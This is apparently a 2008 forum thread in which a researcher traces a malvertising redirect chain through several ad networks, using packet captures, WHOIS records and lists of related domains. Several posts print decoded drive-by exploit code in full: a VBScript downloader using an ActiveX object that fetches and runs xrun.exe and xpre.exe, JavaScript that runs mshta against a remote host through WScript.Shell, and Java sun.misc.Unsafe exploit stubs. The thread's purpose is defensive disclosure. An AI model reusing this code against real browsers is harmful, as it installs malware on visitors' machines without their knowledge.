Size: 1,681 bytes
c:\Program Files\TrustedAntivirus\Graphics\ga6p.gif
Date: 12/15/2006 12:24 PM
Size: 4,151 bytes
c:\Program Files\TrustedAntivirus\Graphics\kb.url
Date: 3/6/2008 11:02 PM
Size: 74 bytes
c:\Program Files\TrustedAntivirus\Graphics\main.ico
Date: 11/24/2006 7:00 PM
Size: 3,774 bytes
c:\Program Files\TrustedAntivirus\Graphics\mini.ico
Date: 11/24/2006 6:11 PM
Size: 28,646 bytes
c:\Program Files\TrustedAntivirus\Graphics\Online.url
Date: 3/6/2008 11:02 PM
Size: 74 bytes
c:\Program Files\TrustedAntivirus\Graphics\rm.url
Date: 3/6/2008 11:02 PM
Size: 62 bytes
c:\Program Files\TrustedAntivirus\Graphics\support.ico
Date: 12/16/2005 11:02 AM
Size: 25,214 bytes
c:\Program Files\TrustedAntivirus\Graphics\Support.url
Date: 3/6/2008 11:02 PM
Size: 74 bytes
c:\Program Files\TrustedAntivirus\Graphics\uninstall.ico
Date: 10/6/2005 12:09 PM
Size: 1,406 bytes
c:\Program Files\TrustedAntivirus\LA\lapv.dat
Date: 3/6/2008 11:02 PM
Size: 3 bytes
c:\Program Files\TrustedAntivirus\LA\License.rtf
Date: 3/6/2008 11:01 PM
Size: 10,817 bytes
c:\Program Files\TrustedAntivirus\Tools\pblock.dll
Date: 11/27/2007 5:30 PM
Size: 222,208 bytes
c:\Program Files\TrustedAntivirus\Tools\sbiebho.dll
Date: 11/27/2007 5:31 PM
Size: 1,102,848 bytes
c:\Program Files\TrustedAntivirus\Up\ASupdater.dat
Date: 3/6/2008 11:02 PM
Size: 359 bytes
c:\Program Files\TrustedAntivirus\Up\gup.exe
Date: 11/7/2007 6:17 PM
Size: 716,800 bytes
c:\Program Files\TrustedAntivirus\Up\PGupdater.dat
Date: 3/6/2008 11:02 PM
Size: 359 bytes
c:\Program Files\TrustedAntivirus\Up\UBupdater.dat
Date: 3/6/2008 11:02 PM
Size: 359 bytes
c:\Program Files\TrustedAntivirus\Up\up.dat
Date: 3/6/2008 11:02 PM
Size: 41 bytes
c:\Program Files\TrustedAntivirus\Up\updater.dat
Date: 3/6/2008 11:02 PM
Size: 259 bytes
c:\Temp\txNog4220.exe
Date: 3/6/2008 10:40 PM
Size: 212,118 bytes
c:\Temp\1cb\syscheck.log
Date: 1/9/2008 6:44 AM
Size: 28,747 bytes
c:\Temp\sanR24\lDii.log
Date: 3/6/2008 10:41 PM
Size: 1,858 bytes
c:\WINDOWS\17PHolmes572.exe
Date: 3/6/2008 10:46 PM
Size: 37,376 bytes
c:\WINDOWS\mrofinu1000106.exe
Date: 3/6/2008 10:47 PM
Size: 37,376 bytes
c:\WINDOWS\mrofinu572.exe.tmp
Date: 3/6/2008 10:41 PM
Size: 37,376 bytes
c:\WINDOWS\uninstall_nmon.vbs
Date: 1/3/2006 5:45 PM
Size: 1,989 bytes
c:\WINDOWS\Downloaded Program Files\UGA6P_0001_N122M2802NetInstaller.exe
Date: 2/28/2008 4:57 PM
Size: 185,344 bytes
c:\WINDOWS\S0xZ\asappsrv.dll
Date: 8/2/2005 4:46 PM
Size: 187,904 bytes
c:\WINDOWS\S0xZ\command.exe
Date: 8/2/2005 4:58 PM
Size: 293,888 bytes
c:\WINDOWS\S0xZ\mXUt.vbs
Date: 7/29/2005 4:24 PM
Size: 472 bytes
c:\WINDOWS\system32\atmtd.dll
Date: 3/6/2008 10:50 PM
Size: 687,592 bytes
c:\WINDOWS\system32\atmtd.dll._
Date: 3/6/2008 10:50 PM
Size: 687,592 bytes
c:\WINDOWS\system32\ddcdbxu.dll
Date: 3/6/2008 10:49 PM
Size: 36,352 bytes
c:\WINDOWS\system32\fccbbya.dll
Date: 3/6/2008 10:39 PM
Size: 36,352 bytes
c:\WINDOWS\system32\jkkihgg.dll
Date: 3/6/2008 10:45 PM
Size: 36,352 bytes
c:\WINDOWS\system32\khfcb.dll
Date: 3/6/2008 10:44 PM
Size: 332,800 bytes
c:\WINDOWS\system32\MSINET.DEP
Date: 6/18/1998 5:00 AM
Size: 2,407 bytes
c:\WINDOWS\system32\MSINET.oca
Date: 4/26/2007 6:30 AM
Size: 29,184 bytes
c:\WINDOWS\system32\MSINET.OCX
Date: 6/24/1998 5:00 AM
Size: 115,016 bytes
c:\WINDOWS\system32\msnav32.ax
Date: 3/6/2008 10:47 PM
Size: 32 bytes
c:\WINDOWS\system32\pac.txt
Date: 9/24/2007 2:05 AM
Size: 279,600 bytes
c:\WINDOWS\system32\qomjgfg.dll
Date: 3/6/2008 10:45 PM
Size: 36,352 bytes
c:\WINDOWS\system32\tuvvtrp.dll
Date: 3/6/2008 10:45 PM
Size: 36,352 bytes
c:\WINDOWS\system32\urqommk.dll
Date: 3/6/2008 10:48 PM
Size: 36,352 bytes
c:\WINDOWS\system32\ax9\np89104.exe
Date: 2/7/2008 11:07 PM
Size: 136,111 bytes
c:\WINDOWS\system32\bv2\renabcom4.exe
Date: 2/14/2008 4:42 PM
Size: 49,152 bytes
c:\WINDOWS\system32\drivers\dhlp.sys
Date: 3/6/2008 11:02 PM
Size: 46,592 bytes
c:\WINDOWS\system32\ev4\philcom3.exe
Date: 8/14/2007 11:22 PM
Size: 25,105 bytes
c:\WINDOWS\system32\iDlo01\iDlo011065.exe
Date: 2/24/2008 8:45 AM
Size: 32,768 bytes
c:\WINDOWS\Temp\cc12.tmp
Date: 3/6/2008 11:07 PM
Size: 0 bytes

Adverts ? No thanks !
Kimberly
Jun 10 2008, 06:13 PM
<h4>
New domains - placeholders
</h4>
The redirect is coming through the combo www.axill.com & ad2.adecn.com also.

Placeholder.

www.awltovhc.net

CODE
GET http://www.awltovhc.net/placeholder-1701629-86358216?atype=b0&pid=108459 HTTP/1.1
Accept: */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.awltovhc.net
Proxy-Connection: Keep-Alive
______________________________

Iframes.

The 3 links still contain obfuscated scripts & exploits, slightly different as above but with the same results. They can be safely viewed using a sniffer. I will only post decoded parts.

CODE
GET http://adxbnet.net/code/smain.php?scout=acxcrds HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adxbnet.net
Proxy-Connection: Keep-Alive

CODE
Call DownExRdsDsc("http://adxbnet.net/xrun.exe", "xrun.exe")
Call DownExRdsDsc("http://adxbnet.net/xpre.exe", "xpre.exe")
CODE
GET http://adxbnet.net/code/smain.php?scout=acxcobj HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adxbnet.net
Proxy-Connection: Keep-Alive

CODE
if(b) { try { b.run("mshta http://adxbnet.net/code/srun.php", 0); }catch(e){} }
...
Call DownExRdsDsc("http://adxbnet.net/xrun.exe", "xrun.exe")
Call DownExRdsDsc("http://adxbnet.net/xpre.exe", "xpre.exe")
CODE
GET http://adxbnet.net/code/smain.php?scout=jvcxeng HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1331648&tid=86353614
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: adxbnet.net
Proxy-Connection: Keep-Alive

CODE
// SJ_SECMAN INVOKE
function sjvmsec() { try {
var sda="http://adxbnet.net/xrun.exe;http://adxbnet.net/xpre.exe";
var con=jvmsec.getClass().forName("sun.plugin.liveconnect.SecureInvocation");
var sys=jvmsec.getClass().forName("java.lang.System");
var sec=jvmsec.getClass().forName("java.lang.SecurityManager");
jvmsec.main(con, sys, sec, sda);
} catch(e) {} }

// SJ_USAFE INVOKE
function sjvmusaf() { try {
var sda = "http://adxbnet.net/xrun.exe;http://adxbnet.net/xpre.exe";
var ucl = jvmusafe.getClass().forName("sun.misc.Unsafe");
var umt = ucl.getMethod("getUnsafe", null);
var usf = umt.invoke(umt, null);
jvmusafe.main(usf);
var dcl = usf.defineClass("vlocal", jvmusafe.bclass, 0, jvmusafe.classsz);
var dcd = usf.allocateInstance(dcl);
dcd.vload(usf, sda);
} catch(d) {} }
______________________________

Banner.

85.17.162.100/banner/mp3downloads.jpg
IPB Image
______________________________

adxbnet.net - 83.216.217.242

ICANN Registrar: MONIKER ONLINE SERVICES, INC.
Created: 2008-05-26
Expires: 2009-05-26
Registrar Status: clientDeleteProhibited
Registrar Status: clientTransferProhibited
Registrar Status: clientUpdateProhibited
Name Server: NS1.DOMAINSERVICE.COM (has 361,990 domains)
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Whois Server: whois.moniker.com

Server Type: Apache/2.2.3 (CentOS)
IP Address: 83.216.217.242
IP Location - Niederosterreich - Baden - Colobase Customer Allocation
Reverse IP: 20 other sites hosted on this server.

Domain Name: ADXBNET.NET

Registrant [1398527]:
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US

Websites.
  1. Adoutfer.net
  2. Adpopserve.net
  3. Adpopshow.net
  4. Adpopups.net
  5. Adxanet.net
  6. Adxbnet.net
  7. Adxrnet.net
  8. Awofkwy.net
  9. Especialads.com
  10. Iefjios.net
  11. Kasdfps.net
  12. Kiafjwo.net
  13. Netaddirect.com
  14. Netcrefer.net
  15. Netcshow.net
  16. Netsdir.net
  17. Snipenet.net
  18. Snipernet.biz
  19. Snipernet.us
  20. Sxload.net
  21. Xpseek.net
Iefjios.net is currently being used as a placeholder also.
______________________________

ad.adrefer.net - 85.17.162.100

ICANN Registrar: MONIKER ONLINE SERVICES, INC.
Created: 2007-05-02
Expires: 2009-05-02
Registrar Status: clientDeleteProhibited
Registrar Status: clientTransferProhibited
Registrar Status: clientUpdateProhibited
Name Server: NS1.DOMAINSERVICE.COM (has 361,990 domains)
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Whois Server: whois.moniker.com

Server Type: Apache/2.0.52 (CentOS)
IP Address: 85.17.162.100
IP Location - Noord-holland - Amsterdam - Leaseweb
Reverse IP: 4 other sites hosted on this server

Domain Name: ADREFER.NET

Registrant [693328]:
Moniker Privacy Services
20 SW 27th Ave.
Suite 201
Pompano Beach
FL
33069
US

Websites.
  1. Adrefer.net
  2. Awltovhc.net
  3. Ikwlkad.net
  4. Iwdjiamk.net
  5. Tqlkg.net
______________________________

adecn.com (Microsoft) has been notified.


Note: Thanks for the PM about adxbnet.net and ikwlkad.net
Kimberly
Jun 12 2008, 05:57 PM
I wasn't satisfied with the network captures made the other day as I got "caught" by surprise. So here we go.

In this packet capture, we see www.axill.com & ad2.adecn.com
CODE
GET http://ad2.adecn.com/here.spot?v=2.2;time=418;spotId=7094;c=0;ms=1213289268868 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.axill.com/cpm/Cpm.aspx?affid=31637&W=468
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ad2.adecn.com
Proxy-Connection: Keep-Alive
Cookie: EC=9320d7d22ea7abac005dba884e3f4785

In the ad2.adecn.com capture, we notice an iframe giving us the next location.
CODE
<script language="javascript" src="http://ad.adrefer.net/serve/servemsr?atype=b0&pid=108459"></script></body>

That page, contains another iframe. Notice the ad2.adecn.com in the referer.
CODE
GET http://ad.adrefer.net/serve/servemsr?atype=b0&pid=108459 HTTP/1.1
Accept: */*
Referer: http://ad2.adecn.com/here.spot?v=2.2;time=418;spotId=7094;c=0;ms=1213289268868
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ad.adrefer.net
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Thu, 12 Jun 2008 16:47:52 GMT
Server: Apache/2.0.52 (CentOS)
Content-Location: servemsr.php
Vary: negotiate
TCN: choice
X-Powered-By: PHP/4.3.9
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Last-Modified: Thu, 12 Jun 2008 16:47:52 GMT
Expires: Mon, 01 Jul 2000 01:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-length: 805
Proxy-connection: keep-alive

document.write('<iframe src="http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1291138&tid=867817323" width="468" height="60" frameborder="0" scrolling="no"></iframe>');

From there, we will be redirected again to a placeholder.
CODE
GET http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1291138&tid=867817323 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad2.adecn.com/here.spot?v=2.2;time=418;spotId=7094;c=0;ms=1213289268868
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ad.adrefer.net
Proxy-Connection: Keep-Alive

<script type="text/javascript" language="javascript" src="http://www.ikwlkad.net/placeholder-1740304-867821418?atype=b0&pid=108459"></script>
</body></html>

CODE
GET http://www.ikwlkad.net/placeholder-1740304-867821418?atype=b0&pid=108459 HTTP/1.1
Accept: */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1291138&tid=867817323
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.ikwlkad.net
Proxy-Connection: Keep-Alive

www.ikwlkad.net/placeholder-1740304-867821418 contains some unescaped text which decodes to the next location and the advertising image to display.
CODE
document.write(unescape("%3Ca%20href%3D%22http%3A%2F%2Fklnl04.movies01.hop.clickbank.net%3Fid%3Dtmoviedwnloading_w2%22%20target%3D%22_top%22%3E%3Cimg%20src%3D%22http%3A%2F%2F85.17.162.100%2Fbanner%2Fmoviedownloads.jpg%22%20width%3D%22468%22%20height%3D%2260%22%20alt%3D%22MOVIEDOWNLOADS%22%20border%3D%220%22%2F%3E%3C%2Fa%3E%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A%2F%2Fwww.awofkwy.net%2Fplaceholder-1603100-867826860%22%3E%3C%2Fscript%3E"));

Decoded.
CODE
<a href="http://klnl04.movies01.hop.clickbank.net?id=tmoviedwnloading_w2" target="_top"><img src="http://85.17.162.100/banner/moviedownloads.jpg" width="468" height="60" alt="MOVIEDOWNLOADS" border="0"/></a><script language="javascript" src="http://www.awofkwy.net/placeholder-1603100-867826860"></script>

www.awofkwy.net/placeholder-1603100-867826860 contains obfuscated code as seen below. Once decoded, they show us our 3 iframes as seen earlier.

IPB Image

IPB Image
______________________________

Banner.
IPB Image
Kimberly
Jun 14 2008, 04:19 PM
New round ... from a highly visited website this time. Combo ad.directaclick.com and ad2.adecn.com this time.

ad2.adecn.com/here.spot?v=2.2;time=617;spotId=6720;c=0;ms=1213456740767
cds.adecn.com/adecn/script.js
ad.adrefer.net/serve/servemsr?atype=b0&pid=108459
ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1583409&tid=1370239143
www.tqlkg.net/placeholder-1730207-1370241411?atype=b0&pid=108459
CODE
<a href="http://www.kqzyfj.com/click-2406336-10418121" target="_top"><img src="http://www.lduhtrp.net/image-2406336-10418121" width="468" height="60" alt="" border="0"/></a><script language="javascript" src="http://www.kasdfps.net/placeholder-1560236-1370245887"></script>

www.lduhtrp.net/image-2406336-10418121
www.lduhtrp.net
CODE
GET http://www.lduhtrp.net/image-2406336-10418121 HTTP/1.1
Accept: */*
Referer: http://ad.adrefer.net/serve/showmsr?atype=b0&pid=108459&cid=1583409&tid=1370239143
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.lduhtrp.net
Proxy-Connection: Keep-Alive

HTTP/1.0 302 Found
Server: Resin/2.1.17
P3P: policyref="http://www.lduhtrp.net/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Sat, 14 Jun 2008 15:19:09 GMT
Location: http://www.yceml.net/0969/10418121-6.jpg
Content-Type: text/plain
Date: Sat, 14 Jun 2008 15:19:08 GMT
Proxy-connection: close

The URL has moved <a href="http://www.yceml.net/0969/10418121-6.jpg">here</a>
HTTP/1.1 200 OK
Date: Sat, 14 Jun 2008 15:19:09 GMT

www.yceml.net/0969/10418121-6.jpg
www.kasdfps.net/placeholder-1560236-1370245887
adxbnet.net/code/smain.php?scout=acxcrds
adxbnet.net/code/smain.php?scout=acxcobj
adxbnet.net/code/smain.php?scout=jvcxeng
Banner.
IPB Image
______________________________

lduhtrp.net - 63.215.202.74

Website Title: Commission Junction - Privacy Policy (Internet User Privacy)
ICANN Registrar: NETWORK SOLUTIONS, LLC.

IP Location - California - Milpitas - Valueclick Inc

Registrant:
Commission Junction
530 East Montectio St.
Santa Barbara, CA 93103
US

Domain Name: LDUHTRP.NET

Administrative Contact, Technical Contact:
ValueClick
30699 Russell Ranch Rd
Ste 250
Westlake Village, CA 91361
US
818-575-4500

Record expires on 05-Apr-2009.
Record created on 05-Apr-2004.
Database last updated on 14-Jun-2008 11:46:13 EDT.

Domain servers in listed order:

NS1.MEDIAPLEX.COM 64.158.223.64
NS2.MEDIAPLEX.COM 64.70.10.79

Websites.
  1. Afcyhf.com
  2. Anrdoezrs.net
  3. Awltovhc.com
  4. Dpbolvw.net
  5. Ftjcfx.com
  6. Ipowerwebspecials.com
  7. Jdoqocy.com
  8. Kqzyfj.com
  9. Lduhtrp.net
  10. Qkimg.net
  11. Qksrv.net
  12. Qksz.net
  13. Tkqlhce.com
  14. Tqlkg.com
______________________________

www.yceml.net - 96.17.8.24

Website Title: Commission Junction - Privacy Policy (Internet User Privacy)
ICANN Registrar: NETWORK SOLUTIONS, LLC.
IP Address: 96.17.8.24
IP Location - Massachusetts - Cambridge - Akamai Technologies
Reverse IP: 256 other sites hosted on this server.

Registrant:
Commission Junction
530 East Montectio St.
Santa Barbara, CA 93103
US

Domain Name: YCEML.NET

Administrative Contact, Technical Contact:
ValueClick
30699 Russell Ranch Rd
Ste 250
Westlake Village, CA 91361
US
818-575-4500

Record expires on 07-Apr-2009.
Record created on 07-Apr-2004.
Database last updated on 14-Jun-2008 12:14:00 EDT.

Domain servers in listed order:

NS1.MEDIAPLEX.COM 64.158.223.64
NS2.MEDIAPLEX.COM 64.70.10.79
______________________________

The site where this advertisement / redirect are appearing has been alerted and I really hope that the owner will be able to block these ads from being displayed. I'm extremely disappointed that AdECN hasn’t done anything yet to fix this issue. They have full network captures proving that the redirect is happening through their network.

I highly recommend to block everything coming from ad.adrefer.net
______________________________

Update

Thanks to the speedy reply of the site owner drinks.gif, DirectaClick has been contacted / alerted also about the issue.
Kimberly
Jul 16 2008, 12:12 AM
New domain via clicksor & especialads.com - thanks to wagdoll for reporting this.

adxcnet.net - 92.61.62.42

Website Title: None given.
ICANN Registrar: MONIKER ONLINE SERVICES, INC.
Created: 2008-07-14
Expires: 2009-07-14
Updated: 2008-07-14
Registrar Status: clientDeleteProhibited
Registrar Status: clientTransferProhibited
Registrar Status: clientUpdateProhibited
Name Server: NS1.DOMAINSERVICE.COM (has 441,416 domains)
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Whois Server: whois.moniker.com

IP Address: 92.61.62.42
IP Location - Austria
Reverse IP: 23 other sites hosted on this server.
  1. Adoutfer.net
  2. Adpopserve.net
  3. Adpopshow.net
  4. Adpopups.net
  5. Adxbnet.net
  6. Awofkwy.net
  7. Biserica-emanuel.net
  8. Daemonlinks.info
  9. Ddload.net
  10. Dvden.net
  11. Especialads.com
  12. Iefjios.net
  13. Kasdfps.net
  14. Kiafjwo.net
  15. Netaddirect.com
  16. Netcrefer.net
  17. Netcshow.net
  18. Netsdir.net
  19. Nseek.org
  20. Snipenet.net
  21. Snipernet.biz
  22. Snipernet.us
  23. Snnet.biz
  24. Sxload.net
Kimberly
Oct 2 2008, 05:15 PM
I ran into them again through Clicksor advertising. Didn't see a trace from especialads.com, it has been replaced by espads.net.

<h4>
Starting point at Clicksor
</h4>
creative2.clicksor.com/network_1/66990/c594447302.html

CODE
<script language="javascript" src="http://espads.net/banner/serve.php?sv=728x90"></script>

CODE
GET http://espads.net/banner/serve.php?sv=728x90 HTTP/1.1
Accept: */*
Referer: http://creative2.clicksor.com/network_1/66990/c594447302.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: espads.net
Proxy-Connection: Keep-Alive
The page contains an encrypted script which once decoded gives:

CODE
document.location.href = "http://espads.net/banner/show.php?cid=1153503&tid=6714355977&sv=728x90";

<h4>
espads.net
</h4>
espads.net/banner/show.php?

Again an encrypted script, decoded:

CODE
<a href="http://click.linksynergy.com/fs-bin/click?id=OgxcJ07Gfq0&offerid=146891.10000037&type=4&subid=0" target="_blank"><IMG alt="Fujitsu Computer Systems Corporation" border="0" src="http://www.fujitsupc.com/www/content/banners/st4000_728x90.jpg"></a><IMG border="0" width="1" height="1" src="http://ad.linksynergy.com/fs-bin/show?id=OgxcJ07Gfq0&bids=146891.10000037&type=4&subid=0">
<script language="javascript" src="http://www.kasdfps.net/placeholder-1538439-2877584061"></script>
  1. ad.linksynergy.com/fs-bin/show?id=[removed] just points to a gif file.

    CODE
    HTTP/1.1 200 OK
    Date: Thu, 02 Oct 2008 14:53:15 GMT
    Server: Apache/1.3.34 (Unix) mod_perl/1.29
    Expires: Thu, 02 Oct 2008 16:53:15 GMT
    Content-Type: image/gif
    Proxy-connection: close

  2. Banner to be displayed: www.fujitsupc.com/www/content/banners/st4000_728x90.jpg

    IPB Image

  3. Link to www.kasdfps.net
<h4>
www.kasdfps.net
</h4>
CODE
GET http://www.kasdfps.net/placeholder-1538439-2877584061 HTTP/1.1
Accept: */*
Referer: http://espads.net/banner/show.php?cid=1153503&tid=6714355977&sv=728x90
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.kasdfps.net
Proxy-Connection: Keep-Alive

The script once decoded, shows 4 iframes:
CODE
<iframe src="http://ssa.adxdnet.net/code/smain.php?scout=acxcrds" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://ssa.adxdnet.net/code/smain.php?scout=acxcobj" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://ssa.adxdnet.net/code/smain.php?scout=jvcxeng" frameborder="0" style="width:1px;height:1px;"></iframe>
<iframe src="http://ssa.adxdnet.net/code/smain.php?scout=objmsit" frameborder="0" style="width:1px;height:1px;"></iframe>
All the pages at ssa.adxdnet.net contain obfuscated scripts. Below is their content once decoded. The remaining Unescape parts have their decoded value added as a comment by me - see the // parts.

ssa.adxdnet.net/code/smain.php?scout=acxcrds

CODE
<script language="VBScript">
on error resume next
Function DownExRdsDsc(source, target)
on error resume next
Dim cobj, xobj, aobj, eobj, sobj, tfld, eloc
Set cobj = document.createElement("object")
cobj.setAttribute "classid", Unescape("%"+"63%6c%73%69%"+"64%3a%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36")
//"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%6e%48%"+"74%74%70%2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74%2e%35%2e%31"),"")
// "WinHttp.WinHttpRequest.5.1"
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"57%69%6e%48%74%74%70%"+"2e%57%69%6e%48%74%74%70%52%65%71%75%65%73%74"),"")
// "WinHttp.WinHttpRequest"
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%69%63%72%"+"6f%73%6f%66%74%2e%58%4d%4c%48%54%54%50"),"")
// "Microsoft.XMLHTTP"
If VarType(xobj) <> vbObject Then Set xobj = cobj.CreateObject(Unescape("%"+"4d%53%58%4d%"+"4c%32%2e%58%4d%4c%48%54%54%50"),"")
// "MSXML2.XMLHTTP"
Set aobj = cobj.CreateObject(Unescape("%"+"41%44%4f%44%"+"42%2e%53%74%72%65%61%6d"),"")
// "ADODB.Stream"
Set eobj = cobj.CreateObject(Unescape("%"+"53%68%65%6c%6c%2e%"+"41%70%70%6c%69%63%61%74%69%6f%6e"),"")
// "Shell.Application"
Set sobj = cobj.CreateObject(Unescape("%"+"53%63%72%69%70%74%69%6e%"+"67%2e%46%69%6c%65%53%79%73%74%65%6d%4f%62%6a%65%63%74"),"")
// "Scripting.FileSystemObject"
If VarType(xobj) And VarType(aobj) And VarType(eobj) And VarType(sobj) Then
xobj.Open "GET", source, False
xobj.Send
Set tfld = sobj.GetSpecialFolder(2)
eloc = sobj.BuildPath(tfld, target)
If sobj.FileExists(eloc) = False Then
If Len(xobj.responseBody) > 1 And InStr(LCase(xobj.responseText), "<html>") = 0 Then
aobj.type = 1
aobj.open
aobj.write xobj.responseBody
aobj.savetofile eloc, 2
aobj.close
End If
End If
If sobj.FileExists(eloc) Then eobj.ShellExecute eloc, "", "", "open", 0
End If
End Function
Call DownExRdsDsc("http://ssa.adxdnet.net/xrun.exe", "xrun.exe")
Call DownExRdsDsc("http://ssa.adxdnet.net/xpre.exe", "xpre.exe")
</script>

ssa.adxdnet.net/code/smain.php?scout=acxcobj

CODE
<script language="javascript">
var a = false; var b = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", unescape("%"+"63%6c%73%69%64%3a%"+"42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36")); }catch(e){} }  
// "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%63%72%"+"69%70%74%2e%53%68%65%6c%6c"),""); }catch(e){} }
//"WScript.Shell"
if(b) { try { b.run("mshta http://ssa.adxdnet.net/code/srun.php", 0); }catch(e){} }

var a = false; var b = false;
try { var a = document.createElement("object"); }catch(e){}
if(a) { try { a.setAttribute("classid", unescape("%"+"63%6c%73%69%64%"+"3a%41%42%39%42%43%45%44%44%2d%45%43%37%45%2d%34%37%45%31%2d%39%33%32%32%2d%44%34%41%32%31%30%36%31%37%31%31%36")); }catch(e){} }
// "clsid:AB9BCEDD-EC7E-47E1-9322-D4A210617116"
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%63%72%69%70%"+"74%2e%53%68%65%6c%6c")); }catch(e){} }
// "WScript.Shell"
if(b) { try { b.run("mshta http://ssa.adxdnet.net/code/srun.php", 0); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject(unescape("%"+"54%78%"+"43%74%78%2e%54%72%61%6e%73%61%63%74%69%6f%6e%43%6f%6e%74%65%78%74")); }catch(e){}
// "TxCtx.TransactionContext"
if(a) { try { var b = a.CreateInstance(unescape("%"+"57%53%"+"63%72%69%70%74%2e%53%68%65%6c%6c")); }catch(e){} }
// "WScript.Shell"
if(b) { try { b.run("mshta http://ssa.adxdnet.net/code/srun.php", 0); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject(unescape("%"+"57%4d%49%53%63%72%69%70%"+"74%55%74%69%6c%73%2e%57%4d%49%4f%62%6a%65%63%74%42%72%6f%6b%65%72%32")); }catch(e){}
// "WMIScriptUtils.WMIObjectBroker2"
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%63%72%69%70%"+"74%2e%53%68%65%6c%6c")); }catch(e){} }
// "WScript.Shell"
if(b) { try { b.run("mshta http://ssa.adxdnet.net/code/srun.php", 0); }catch(e){} }

var a = false; var b = false;
try { var a = new ActiveXObject(unescape("%"+"4f%75%74%6c%6f%6f%6b%"+"2e%41%70%70%6c%69%63%61%74%69%6f%6e")); }catch(e){}
// "Outlook.Application"
if(a) { try { var b = a.CreateObject(unescape("%"+"57%53%63%"+"72%69%70%74%2e%53%68%65%6c%6c")); }catch(e){} }
// "WScript.Shell"
if(b) { try { b.run("mshta http://ssa.adxdnet.net/code/srun.php", 0); }catch(e){} }

var a = false;
